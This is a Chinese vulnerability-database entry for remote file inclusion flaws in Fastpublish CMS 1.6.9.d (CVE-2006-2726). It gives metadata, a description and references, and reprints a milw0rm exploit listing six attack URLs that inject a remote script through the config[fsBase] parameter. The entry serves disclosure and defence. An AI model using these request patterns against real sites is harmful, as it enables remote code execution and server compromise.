Fastpublish CMS 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110354 漏洞类型 输入验证
发布时间 2006-05-29 更新时间 2006-06-01
CVE编号 CVE-2006-2726 CNNVD-ID CNNVD-200606-031
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1848
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-031
|漏洞详情
FastpublishCMS1.6.9.d存在PHP远程文件包含漏洞,远程攻击者可通过在(1)drucken.php,(2)drucken2.php,(3)email_an_benutzer.php,(4)rechnung.php,(5)suche/search.php和(6)adminbereich/admin.php内config[fsBase]参数来包含任意文件。
|漏洞EXP
################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
# Script site: http://www.fastpublish.org
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-29]
|参考资料

来源:VUPEN
名称:ADV-2006-2043
链接:http://www.frsirt.com/english/advisories/2006/2043
来源:SECUNIA
名称:20346
链接:http://secunia.com/advisories/20346
来源:MILW0RM
名称:1848
链接:http://milw0rm.com/exploits/1848
来源:XF
名称:fastpublish-fsbase-file-include(26897)
链接:http://xforce.iss.net/xforce/xfdb/26897
来源:BID
名称:18163
链接:http://www.securityfocus.com/bid/18163
来源:OSVDB
名称:26162
链接:http://www.osvdb.org/26162
来源:OSVDB
名称:26161
链接:http://www.osvdb.org/26161
来源:OSVDB
名称:26160
链接:http://www.osvdb.org/26160
来源:OSVDB
名称:26159
链接:http://www.osvdb.org/26159
来源:OSVDB
名称:26158
链接:http://www.osvdb.org/26158
来源:OSVDB
名称:26157
链接:http://www.osvdb.org/26157